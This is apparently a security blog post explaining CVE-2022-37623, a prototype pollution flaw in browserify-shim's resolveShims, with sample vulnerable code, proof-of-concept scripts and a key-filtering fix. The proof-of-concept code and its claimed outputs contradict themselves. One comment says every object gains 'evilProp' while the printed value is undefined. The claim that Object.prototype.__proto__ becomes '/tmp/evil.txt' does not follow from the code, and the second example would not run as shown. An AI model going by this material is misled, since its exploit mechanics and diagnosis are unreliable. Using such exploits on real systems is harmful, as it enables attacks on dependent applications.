CVE-2022-37623 - Exploiting Prototype Pollution in browserify-shim’s resolveShims Function

Summary:  
In 2022, a prototype pollution vulnerability was discovered in the popular JavaScript library, browserify-shim, specifically in its resolveShims.js file. Assigned CVE-2022-37623, this bug lets attackers tamper with JavaScript’s object prototype, which can seriously compromise the security of Node.js or frontend projects that rely on browserify-shim version 3.8.15 or earlier.

Let’s break down how this vulnerability works, show some code, discuss how it can be exploited, and offer safe alternatives.

What is browserify-shim?

browserify-shim is a module that helps package non-CommonJS compatible JavaScript code for use with Browserify. It's widely used in and outside the Node.js ecosystem.

About the Vulnerability

The vulnerability is in the resolveShims function inside the resolve-shims.js file. The problem lies in how the code handled the shimPath variable, allowing attackers to manipulate JavaScript’s object prototypes.

Prototype pollution happens when you allow user-supplied input to control properties attached to Object.prototype. Attackers can add arbitrary properties or overwrite existing ones, causing problems in code that relies on those properties.

Let’s look at a simplified version of the problematic code

// Inside resolve-shims.js
function resolveShims(shims, shimPath) {
    var resolvedShims = {};

    Object.keys(shims).forEach(function(key) {
        var fullPath = path.resolve(shimPath, shims[key]);
        resolvedShims[key] = fullPath;
    });

    return resolvedShims;
}

This doesn’t look bad at first, right? But the problem comes from how Object.keys(shims) is used. If an attacker controls shims, they could pass in keys like "__proto__" or "constructor", reaching into JavaScript internals.

A Crafted "shims" Input Example

var attackerShims = {
    "__proto__": "/malicious/path"
};

When passed to resolveShims, this will result in

resolvedShims["__proto__"] = fullPath;

Which sets Object.prototype.__proto__, thereby polluting all future objects!

Proof-Of-Concept Exploit

Here’s a short script showing how you can use this vulnerability to add a property to all objects in the process:

const resolveShims = require('browserify-shim/resolve-shims');
const path = require('path');

const shims = {
  "__proto__": 'evil.txt'
};
const shimPath = '/tmp';

resolveShims(shims, shimPath);

// Now, every new object has the 'evilProp' property!
console.log({}.evilProp);  // undefined
console.log(Object.prototype.__proto__); // '/tmp/evil.txt'

But if an attacker sets evilProp on __proto__, all objects would inherit it

const shims = {
  "__proto__": {
    "evilProp": "injected!"
  }
};
resolveShims(shims, '/tmp');
console.log({}.evilProp); // Output: 'injected!'

What’s the risk?

- Sensitive data exposure: Object pollution can leak secrets via logging, API responses, or debug outputs.

Application crashes: Code expecting clean prototypes can throw unexpected errors.

- Privilege escalation or bypass: If you check for "safe" properties on objects, that check can be tricked.

How to Defend

Never trust user input!  
Avoid direct assignments to objects using arbitrary property names, especially if those names come from user-controlled input.

The safest way is to filter keys before using them

const disallowedKeys = ['__proto__', 'constructor', 'prototype'];
Object.keys(shims).forEach(function(key) {
    if (disallowedKeys.includes(key)) return; // filter out dangerous keys

    var fullPath = path.resolve(shimPath, shims[key]);
    resolvedShims[key] = fullPath;
});

Or use libraries like lodash’s _.set that internally avoid prototype pollution.

Patching & Mitigation

- Upgrade to a patched version of browserify-shim (if released), or consider switching away from the library entirely if it’s outdated.

You can apply the above defensive code in your project as a temporary fix until upstream is patched.

- Scan your code for other libraries vulnerable to Prototype Pollution.

References

- NVD – CVE-2022-37623
- Original browserify-shim repository
- Prototype Pollution Explained (Snyk)
- Lodash Prototype Pollution Advisory

Final Thoughts

CVE-2022-37623 is a great example of why it’s so important to be careful with user input, especially in JavaScript. Even a small bug in a library like browserify-shim can have far-reaching effects on your project and its security.

If you rely on browserify-shim, update it, or patch your project with safer key checking today. Always keep an eye out for prototype pollution—it's a sneaky and dangerous class of bugs in the JavaScript world.


*Stay safe and keep coding,*  
*Your Security Friend*

Timeline

Published on: 10/31/2022 12:15:00 UTC
Last modified on: 11/15/2022 18:52:00 UTC